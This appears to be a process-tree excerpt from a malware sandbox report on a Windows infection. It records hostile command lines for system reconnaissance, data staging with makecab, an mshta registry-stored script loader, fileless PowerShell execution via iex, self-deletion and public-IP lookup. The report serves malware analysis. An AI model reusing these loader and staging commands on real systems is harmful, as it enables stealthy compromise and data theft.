C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1244
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1640
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:668
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1060
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1500
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:2000
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:760
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\DF28.bin1 > C:\Users\Admin\AppData\Local\Temp\DF28.bin & del C:\Users\Admin\AppData\Local\Temp\DF28.bin1"2⤵PID:1716
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\A342.bin"2⤵PID:1060
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4\\\Clicring'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
PID:848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4").comsclen))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tguvou4w\tguvou4w.cmdline"4⤵PID:456
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC716.tmp" "c:\Users\Admin\AppData\Local\Temp\tguvou4w\CSC2C2DB0E929344433AC965E99D95FF3EA.TMP"5⤵PID:1896
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ja2rul4v\ja2rul4v.cmdline"4⤵PID:1716
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC793.tmp" "c:\Users\Admin\AppData\Local\Temp\ja2rul4v\CSC5CDD3D75252471094144535F11E128.TMP"5⤵PID:1240
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\259362972.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1444 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:852
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\9F70.bi1"2⤵PID:648
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1660
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A574.bi1"2⤵PID:1244
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1496
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9F70.bi1"2⤵PID:432
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A574.bi1"2⤵PID:960
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:268
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:668677 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:976
-